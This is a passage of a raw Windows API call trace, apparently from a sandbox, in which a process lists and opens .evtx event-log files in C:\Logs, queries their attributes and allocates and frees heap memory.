liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.641] CloseHandle (hObject=0x418) returned 1 [0072.642] AreFileApisANSI () returned 1 [0072.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0072.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82e68 [0072.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x82e68, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 65 [0072.642] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.642] GetFileType (hFile=0x418) returned 0x1 [0072.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82e68 | out: hHeap=0x20000) returned 1 [0072.642] CloseHandle (hObject=0x418) returned 1 [0072.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0072.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0072.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0072.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0072.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0072.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0072.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0072.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0072.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0072.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0072.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0072.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0072.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0072.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0072.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0072.643] AreFileApisANSI () returned 1 [0072.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0072.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82b98 [0072.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x82b98, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 65 [0072.643] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b98 | out: hHeap=0x20000) returned 1 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0072.643] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.643] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.643] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cAlternateFileName="MI5FF0~1.EVT")) returned 1 [0072.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0072.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0072.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0072.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.644] AreFileApisANSI () returned 1 [0072.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpUsedDefaultChar=0x0) returned 53 [0072.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0072.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.644] AreFileApisANSI () returned 1 [0072.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0072.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76200 [0072.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 53 [0072.645] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.645] GetFileType (hFile=0x418) returned 0x1 [0072.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.645] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.645] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.645] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.645] CloseHandle (hObject=0x418) returned 1 [0072.646] AreFileApisANSI () returned 1 [0072.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0072.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0072.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 53 [0072.646] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.646] GetFileType (hFile=0x418) returned 0x1 [0072.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.646] CloseHandle (hObject=0x418) returned 1 [0072.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.647] AreFileApisANSI () returned 1 [0072.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0072.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75c60 [0072.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 53 [0072.647] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0072.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.647] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cAlternateFileName="MIBD88~1.EVT")) returned 1 [0072.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0072.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0072.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0072.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0072.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0072.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0072.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0072.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0072.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.824] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0072.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.824] AreFileApisANSI () returned 1 [0072.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpUsedDefaultChar=0x0) returned 54 [0072.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.824] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.824] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.824] AreFileApisANSI () returned 1 [0072.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0072.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75d50 [0072.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 54 [0072.825] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.825] GetFileType (hFile=0x428) returned 0x1 [0072.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0072.825] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.825] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.825] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.826] CloseHandle (hObject=0x428) returned 1 [0072.826] AreFileApisANSI () returned 1 [0072.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0072.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76278 [0072.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 54 [0072.826] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.826] GetFileType (hFile=0x428) returned 0x1 [0072.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.826] CloseHandle (hObject=0x428) returned 1 [0072.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 